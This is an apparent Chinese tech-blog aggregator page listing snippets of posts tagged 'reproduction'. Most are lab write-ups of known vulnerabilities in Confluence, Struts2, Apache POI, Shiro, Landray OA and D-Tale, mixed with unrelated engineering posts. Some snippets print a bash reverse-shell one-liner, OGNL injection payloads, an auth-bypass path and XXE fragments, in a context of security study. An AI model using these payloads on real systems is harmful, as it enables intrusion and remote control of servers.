E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
InternImage复现
Atlassian Confluence Data Center and Server 权限提升漏洞
复现
(CVE-2023-22515)
0x01产品简介AtlassianConfluence是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。是面向大型企业和组织的高可用性、可扩展性和高性能版本。0x02漏洞概述AtlassianConfluenceDataCenterandServer存在权限提升漏洞,未经身份验证的远程攻击者可以利用该漏洞
OidBoy_G
·
2024-01-25 06:30
漏洞复现
atlassian
安全
web安全
蓝凌OA sysUiExtend.do 任意文件上传漏洞
复现
0x01产品简介蓝凌核心产品EKP平台定位为新一代数字化生态OA平台,数字化向纵深发展,正加速构建产业互联网,对企业协作能力提出更高要求,蓝凌新一代生态型OA平台能够支撑办公数字化、管理智能化、应用平台化、组织生态化,赋能大中型组织更高效的内外协作与管理,支撑商业模式创新与转型发展。0x02漏洞概述蓝凌OAsysUiExtend.do接口处存在任意文件上传漏洞,未经过身份认证的攻击者可通过构造压缩
OidBoy_G
·
2024-01-25 06:28
漏洞复现
安全
web安全
Android wifi 连接2.4G WiFi时投屏建立在5G的36信道上_必现
HQ-239436、HQ-240931M17_S_NJ_连接2.4GWiFi时投屏建立在5G的36信道上_必现问题单:测试类型:用例测试
复现
概率:3/3前提条件:NA
复现
步骤:1.测试机连接2.4Gwifi
知识分享小达人
·
2024-01-25 06:47
Wifi
手机(废弃)
Wi-Fi
手机
平板
穿戴知识分享
android
5g
[漏洞
复现
]Apache Struts2/S2-015 (CVE-2013-2134)
二、漏洞
复现
春秋云境.com进入靶场开始
复现
构造payload/${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_
free key
·
2024-01-25 06:41
漏洞复现
春秋云境靶场
Struts
apache
struts
web安全
安全
[漏洞
复现
]Apache POI < 3.10.1 XXE(CVE-2014-3529)
二、漏洞
复现
春秋云境.com进入靶场准备文件和环境创建一个[Content_Types].xml文件和xxe.dtd文件注意名字不可修改###xxe.dtd###">%all;###[Content_Typ
free key
·
2024-01-25 06:10
漏洞复现
春秋云境靶场
web安全
apache
安全
[漏洞
复现
]Apache Struts2/S2-013 (CVE-2013-1966)
二、漏洞
复现
春秋云境.com进入靶场开始
复现
bash-i>&/dev/tcp/127.0.0.1/99990>&1base加密bash-c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOT
free key
·
2024-01-25 06:10
漏洞复现
春秋云境靶场
Struts
apache
struts
java
web安全
安全
[漏洞
复现
] Craft (CVE-2023-41892)
前言本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!一、漏洞情况分析CraftCMS是美国Pixel&tonic公司的一套内容管理系统(CMS)。一个开源的内容管理系统,它专注于用户友好的内容创建过程,逻辑清晰明了,是一个高度自由,高度自定义设计的平台吗,可以用来创建个人或企业网站也可以搭建企业级电子商务系统。Pixel&tonicCraftCMS4.4.15之前版本存在代码
free key
·
2024-01-25 06:10
漏洞复现
安全
web安全
[漏洞
复现
]Apache Shiro < 1.6.0 验证绕过漏洞(CVE-2020-13933)
二、漏洞
复现
春秋云境.com进入靶场开始
复现
/admin/%3b三、漏洞处置建议把靶场关了,跟漏洞说“白白吧”
free key
·
2024-01-25 06:10
春秋云境靶场
漏洞复现
安全
网络
web安全
[漏洞
复现
]Apache Struts2/S2-015 (CVE-2013-2135)
二、漏洞
复现
春秋云境.com进入靶场开始
复现
构造好payload,弹nc${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#
free key
·
2024-01-25 06:04
Struts
春秋云境靶场
apache
struts
java
web安全
安全
蚁剑 Electron XSS反弹shell
复现
二、
复现
过程phpstudy网站根目录添加webs
q1ya
·
2024-01-25 05:20
【SCI
复现
】基于RSSA(随机游走麻雀搜索算法)冷热电联供型微网优化调度
目录1主要内容2部分程序3程序结果4下载链接1主要内容该程序
复现
SCI文献《StudyonEconomicDispatchoftheCombinedCoolingHeatingandPowerMicrogridBasedonImprovedSparrowSearchAlgorithm
科研工作站
·
2024-01-25 04:45
优化调度
冷热电联供
综合能源
matlab
随机游走麻雀搜索算法
改进算法
智能算法
沙漠也有动物么
好吧,现在
复现
了颜色混淆
梨花笑
·
2024-01-25 03:35
EI论文
复现
:考虑冷热运行特性的综合能源系统多时间尺度优化调度程序代码!
适用平台/参考文献:Matlab+Yalmip+Cplex;参考文献:电力系统自动化《含冰蓄冷空调的冷热电联供型微网多时间尺度优化调度》提出考虑冷热特性的综合能源系统多时间尺度优化调度模型,日前计划中通过多场景描述可再生能源的不确定性,侧重于一个运行优化周期内系统的经济运行;日内调度基于日前计划方案,根据冷热电在不同时间尺度上的相关性和互补性,提出考虑冷热负荷变化的双层滚动优化平抑模型。程序中算例
预测及优化
·
2024-01-25 01:17
能源
机器学习
大数据
性能优化
基于开源库imu_gps_localization进行组合导航
文章目录概要数据准备准备工作运行
复现
结果参考概要利用imu和GPS数据进行组合导航,在我的数据集上
复现
效果较差。
点PY
·
2024-01-25 00:29
机器人导航定位
c++
组合导航
gps
imu
D-Tale SSRF漏洞
复现
(CVE-2024-21642)
0x01产品简介D-tale是一个在2020年2月推出的库,是Pandas数据结构的可视化工具。它具有许多功能,对于探索性数据分析非常方便、支持交互式绘图、3d绘图、热图、特征之间的相关性、构建自定义列等等。0x02漏洞概述D-Tale是Pandas数据结构的可视化工具。3.9.0之前的D-Tale版本的用户可能容易受到服务器端请求伪造(SSRF)的攻击,从而使攻击者能够访问服务器上的文件。0x0
OidBoy_G
·
2024-01-24 22:45
漏洞复现
安全
web安全
【
复现
】Hytec Inter HWL 2511 SS路由器RCE漏洞_25
目录一.概述二.漏洞影响三.漏洞
复现
1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述HytecInterHWL2511SS是日本HytecInter公司的一款工业级LTE路由器,可用于远程数据传输
穿着白衣
·
2024-01-24 22:44
安全漏洞
安全
web安全
系统安全
网络安全
【
复现
】万户ezoffice协同管理平台 SQL注入漏洞_26
目录一.概述二.漏洞影响三.漏洞
复现
1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述万户ezOFFICE协同管理平台分为企业版和政务版。
穿着白衣
·
2024-01-24 22:44
安全漏洞
安全
web安全
网络安全
系统安全
数据库
【
复现
】奥威亚视屏云平台文件读取漏洞_27
目录一.概述二.漏洞影响三.漏洞
复现
1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述奥威亚视屏云平台拥有丰富的应用模块,包括结对帮扶、网络教研、教研共同体、优课汇聚、教学资源、在线巡课、AI
穿着白衣
·
2024-01-24 22:44
安全漏洞
安全
web安全
系统安全
网络安全
【
复现
】D-Tale SSRF漏洞(CVE-2024-21642)_26
目录一.概述二.漏洞影响三.漏洞
复现
1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述D-Tale数据可视化插件是后端框架Flask与前端框架React组合产生的一款开源的数据可视化分析插件。
穿着白衣
·
2024-01-24 22:13
安全漏洞
安全
web安全
网络安全
系统安全
百度网盘网页无法调起客户端 目前未解决 2024年1月出现BUG
先记录下各种排查法和
复现
情况。具体问题是:*任意网盘链接,都无法唤醒客户端。*客户端在退出状态网页点击下载可以正常调起客户端下载,客户端后台启动状态下,网页点击下载无法调起客户端。
逸雨清风
·
2024-01-24 18:12
bug
服务器
运维
usb烧录时内存不足
1、问题描述usb烧录的时候遇到内存不足的问题2、
复现
步骤usb烧录3、问题定位打印如下:sunxispriteerr:unabletomallocmemoryforverifyFEX_CMD_fes_verify_value
icy、泡芙
·
2024-01-24 17:47
Android
android
CTF之think_java反序列化完整案例
2020-网鼎杯-朱雀组-Web-think_java详解环境
复现
CTFHub附件代码审计通过打开附件文件中test类文件发现//发现文件路劲@RequestMapping({"/common/test
出顾茅庐
·
2024-01-24 16:49
WEB
CTF
java
安全
38-WEB漏洞-反序列化之PHP&JAVA全解(下)
实现二、序列化理解三、案例演示3.1、本地3.2、Java反序列化及命令执行代码测试3.3、WebGoat_Javaweb靶场反序列化测试3.4、2020-网鼎杯-朱雀组-Web-think_java真题
复现
四
月亮今天也很亮
·
2024-01-24 16:17
小迪安全
web安全
学习
前端
php
java
MyBatis批量添加、更新、删除实战篇(日常开发必看)
前言工作中,经常会遇到很多批量操作的需求:批量添加、批量更新、批量删除、批量导入、批量审核等等,下面这篇文章我们将一一
复现
,首先我们先了解一下mybatis的标签foreach循环:一、MybatIs标签
程序员阿浪
·
2024-01-24 13:57
【时间序列篇】基于LSTM的序列分类-Pytorch实现 part1 案例
复现
本篇文章是对已有一篇文章的整理归纳,并对文章中提及的模型用Pytorch实现。文章目录前言一、任务问题和数据集1任务问题2数据集3数据集读取并展示二、模型实现1数据导入2数据预处理3数据集划分4网络模型及实例化5训练过程三、总结前言序列,可以是采样得到的信号样本,也可以是传感器数据。对于序列分类任务,常用的思路有两种:1、原理统计相关,分解序列的相关性质研究规律(人工设计特征,再分类)2、数据挖掘
钟的子期
·
2024-01-24 07:44
深度学习
lstm
pytorch
深度学习
echarts 切换时出现上一次图形残留。
环境
[email protected]
现象触发步骤:数据量较多时,能稳定
复现
。鼠标悬浮到图表中,使折线图高亮。此时通过echarts.setOption重新绘制图表内
JA+
·
2024-01-24 07:49
echarts
echarts
前端
javascript
PointNet 和 PointNet++ pytorch版本
复现
modelnet40
复现
一下经典的PointNet的pytorch版本记录一下
复现
的过程代码下载gitclonehttps://gitcode.net/mirrors/yanx27/pointnet_pointnet2_pytorch.git
Nice_cool.
·
2024-01-24 06:13
三维点云
pytorch
深度学习
人工智能
利用 Mountpoint for Amazon S3 在 Kubernetes 上加速 LLM 的训练
本文通过在EC2g5.2xl实例上完成LLaMA2的调优训练,读者可以利用较少的GPU资源学习
复现
本
亚马逊云开发者
·
2024-01-24 06:25
kubernetes
容器
云原生
复现
NAS with RL时pytorch的相关问题
optimizer.zero_grad()是什么?optimizer.zero_grad()是PyTorch中的一个操作,它用于清零所有被优化变量(通常是模型的参数)的梯度。在PyTorch中,当你计算某个张量的梯度时(比如通过调用.backward()函数),这个梯度会被累积到.grad属性中,而不是被替换掉。这意味着,每次计算梯度,新的梯度值会被加上旧的梯度值。如果在反向传播前不将梯度清零,那
ThreeS_tones
·
2024-01-24 02:38
DRL
pytorch
人工智能
python
【问题解决】unable to do port forwarding: socat not found
问题
复现
前阵子应公司要求做华为云平台的调研,写了一篇文档包含将华为云CCE下载kuberctl配置及使用kubectl转发流量到本地的操作。
东北小狐狸-Hellxz
·
2024-01-24 00:08
k8s
【漏洞
复现
】用友NC Cloud portal/file接口任意文件读取漏洞
文章目录前言声明一、用友NCCloudportal/file接口简介二、漏洞描述三、影响版本四、漏洞
复现
五、修复建议前言用友网络是全球领先的企业与公共组织软件、云服务、金融服务提供商。
李火火安全阁
·
2024-01-24 00:32
漏洞复现
NC
Cloud
用友 GRP U8 UploadFile 命令执行漏洞
文章目录前言声明一、漏洞描述二、影响版本三、漏洞
复现
前言用友GRP-U8是一款功能全面、灵活度高、可定制性强的ERP软件,能够协助企业实现资源的高效管理,优化企业运营流程,提升整体管理水平。
李火火安全阁
·
2024-01-24 00:57
漏洞复现
GRP-U8
关于在Ubuntu20.04(ROS1 noetic)中使用catkin_make编译时发生的与pyhton版本不兼容的问题解决办法
今天在另外一台电脑上操作
复现
【ROS建模:一起从零手写URDF模型】这个博客时,发生了一些问题,特此记录下来【ROS建模:一起从零手写URDF模型】链接:https://blog.csdn.net/qq
随机惯性粒子群
·
2024-01-23 22:55
ROS
Python
Linux
python
linux
在Windows下根据TensorFlow官方文档部署cuda环境,进而调用GPU来训练神经网络
不仅在编程时需要花费额外精力,在
复现
其他工作时也容易出现各种“别人很少遇到的”bug。以下为原文,发布于2021-02-0121:34:32。
Ayews
·
2024-01-23 20:55
软件配置
tensorflow
深度学习
python
gpu
话说你遇到过这么诡异的事么
一般有反馈APP有Bug,第一反应就是试一下操作流程,看看是不是必现的Bug,如果没有
复现
则是用着和别人一样的环境去测试,保证APP的包版本和我测试的版本是一样的,再然后没办法只能怀疑是iOS系统问题了
玉思盈蝶
·
2024-01-23 19:21
【精选】win7内网穿透&meterpreter后渗透&msf开启摄像头
博主介绍博主介绍:大家好,我是hacker-routing,很高兴认识大家~✨主攻领域:【渗透领域】【应急响应】【python】【VulnHub靶场
复现
】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连
hacker-routing
·
2024-01-23 17:49
【精选】VulnHub
渗透测试靶场练习平台
web
windows
linux系统开发
linux
运维
服务器
网络
网络安全
kali
metersphere
【精选】PHP&java 序列化和反序列化漏洞
博主介绍博主介绍:大家好,我是hacker-routing,很高兴认识大家~✨主攻领域:【渗透领域】【应急响应】【python】【VulnHub靶场
复现
】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连
hacker-routing
·
2024-01-23 17:47
【精选】VulnHub
渗透测试靶场练习平台
windows
linux系统开发
web
php
java
android
linux
服务器
反序列化
kube-controller-manager反复重启解决
背景某环境,kube-controller-manager反复重启,尝试重建kube-controller-manager的pod,但是过一会问题
复现
。
360linux
·
2024-01-23 17:46
一口气用Python写了13个小游戏(附源码)
仅限技术学习参考分享13个游戏源码,可以自己
复现
玩玩,研究下里面的编程逻辑,对学习编程(特别是初学者)应该会有很大帮助。
快乐星球没有乐
·
2024-01-23 15:58
python
爬虫
程序人生
开发语言
游戏程序
【基于BasicSR的GCFSR
复现
踩坑】
写在前面:本博客仅作记录学习之用,部分图片来自网络,如需引用请注明出处,同时如有侵犯您的权益,请联系删除!文章目录前言BasicSR快速开始Pytorch与cuda查看cuda版本安装对应的PytorchGCFSR的项目配置训练命令获取训练可选的参数,使用参数-h:Train_pipeline函数参数解析ResumeLoggerGoodLucklogoDataloader配置文件详解动态实例化与R
东荷新绿
·
2024-01-23 12:08
#
深度学习
学习记录
计算机视觉
深度学习
人工智能
Atlassian Confluence RCE漏洞
复现
(CVE-2023-22527)
0x01产品简介AtlassianConfluence是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。是面向大型企业和组织的高可用性、可扩展性和高性能版本。0x02漏洞概述AtlassianConfluence/template/aui/text-inline.vm接口处存在velocity模板注入,未
OidBoy_G
·
2024-01-23 10:24
漏洞复现
atlassian
安全
web安全
Aria2 WebUI控制台 任意文件读取漏洞
复现
(CVE-2023-39141)
0x01产品简介Aria2WebUI控制台是用于下载文件的实用程序。它支持HTTP(S)/FTP/SFTP/BitTorrent和Metalink协议。aria2可以从多个来源/协议下载文件,并尝试利用您的最大下载带宽。它支持同时从HTTP(S)/FTP/SFTP和BitTorrent下载文件,而从HTTP(S)/FTP/SFTP下载的数据上传到BitTorrent群。使用Metalink块校验和
OidBoy_G
·
2024-01-23 10:24
漏洞复现
安全
web安全
Viessmann Vitogate RCE漏洞
复现
(CVE-2023-45852)
0x03影响范围version<=2.1.3.00x04
复现
环境FOFA:app="Vito
OidBoy_G
·
2024-01-23 10:54
漏洞复现
安全
web安全
PrestaShop购物系统 SQL注入漏洞
复现
(CVE-2023-30150)
0x01产品简介PrestaShop是一个功能丰富,基于PHP5开发的Web2.0网上购物系统。PrestaShop具有可定制,稳定等特点。整个系统只有5.8MB,易于快速安装。0x02漏洞概述PrestaShop的部分主题中使用LeoCustomAjax模块拓展,LeoCustomAjax模块中可以在/modules/leocustomajax/leoajax.php中使用多个GET参数(cat
OidBoy_G
·
2024-01-23 10:20
漏洞复现
安全
web安全
DCASE2019_Task3代码
复现
DCASE2019_Task3代码
复现
参考文献[1]CaoY,KongQ,IqbalT,etal.Polyphonicsoundeventdetectionandlocalizationusingatwo-stagestrategy
双面男人
·
2024-01-23 10:05
python
机器学习
深度学习
YOLOv3(Pytorch版本和Tensorflow版本)学习
一、地址来源YOLOv4最全
复现
代码合集(含PyTorch/TF/Keras和Caffe等)二、Pytorch版本地址:https://github.com/Tianxiaomo/pytorch-YOLOv4
南叔先生
·
2024-01-23 07:48
机器学习
pytorch
tensorflow
深度学习
目标检测基础-RCNN系列模型
开头先感谢可爱的小姐姐的细心讲解,视频网址如下:目标检测基础——RCNN系列模型(理论和代码
复现
)_哔哩哔哩_bilibili目录RCNN过程非极大值抑制(NMS)Bounding-boxregressionRCNN
Hzt_dreamer
·
2024-01-23 07:38
深度学习
机器学习
计算机视觉
图像处理
目标检测
自定义数据集 - Dataset
格式划分训练集和验证集2.自定义dataset1.PASCALVOC格式划分训练集和验证集importosimportrandomdefmain():random.seed(0)#设置随机种子,保证随机结果可
复现
mango1698
·
2024-01-23 07:06
AI
pytorch
python
深度学习
redis未授权访问全漏洞
复现
redis未授权访问全漏洞
复现
Redis有关的漏洞具有明显的时间分段性,在15年11月之前,主要是未授权导致的数据泄露,获得一些账号密码。
清歌secure
·
2024-01-23 07:03
漏洞复现
redis
数据库
web安全
网络安全
网络安全全栈培训笔记(56-服务攻防-数据库安全&H2&Elasticsearch&CouchDB&Influxdb
复现
)
第56天服务攻防-数据库安全&H2&Elasticsearch&CouchDB&Influxdb
复现
知识点:1、服务攻防数据库类型安全2、influxdb,.未授权访问wt验证3、H2database-
清歌secure
·
2024-01-23 07:33
网络安全全栈学习笔记
web安全
笔记
elasticsearch
上一页
11
12
13
14
15
16
17
18
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他